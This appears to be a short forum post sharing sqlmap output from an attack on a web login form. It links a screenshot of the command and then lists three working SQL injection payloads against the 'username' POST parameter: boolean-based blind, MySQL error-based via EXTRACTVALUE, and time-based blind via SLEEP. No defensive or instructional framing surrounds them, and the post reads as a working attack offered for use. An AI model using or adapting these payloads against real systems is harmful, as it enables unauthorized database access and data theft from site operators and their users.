Yesterday, 10:52 PM
sqlmap command:
![[Image: image.png]](https://i.ibb.co/PzD6zBrC/image.png)
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: proel=1&username=test' AND 5680=5680 OR 'WNtm'='Hwiw&password=test&login-form-submit=login
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: proel=1&username=test' AND EXTRACTVALUE(6277,CONCAT(0x5c,0x7170707a71,(SELECT (ELT(6277=6277,1))),0x7176716a71)) OR 'hosw'='Wyvl&password=test&login-form-submit=login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: proel=1&username=test' AND (SELECT 4175 FROM (SELECT(SLEEP(5)))Zkor) OR 'KkXa'='OZOE&password=test&login-form-submit=login
---
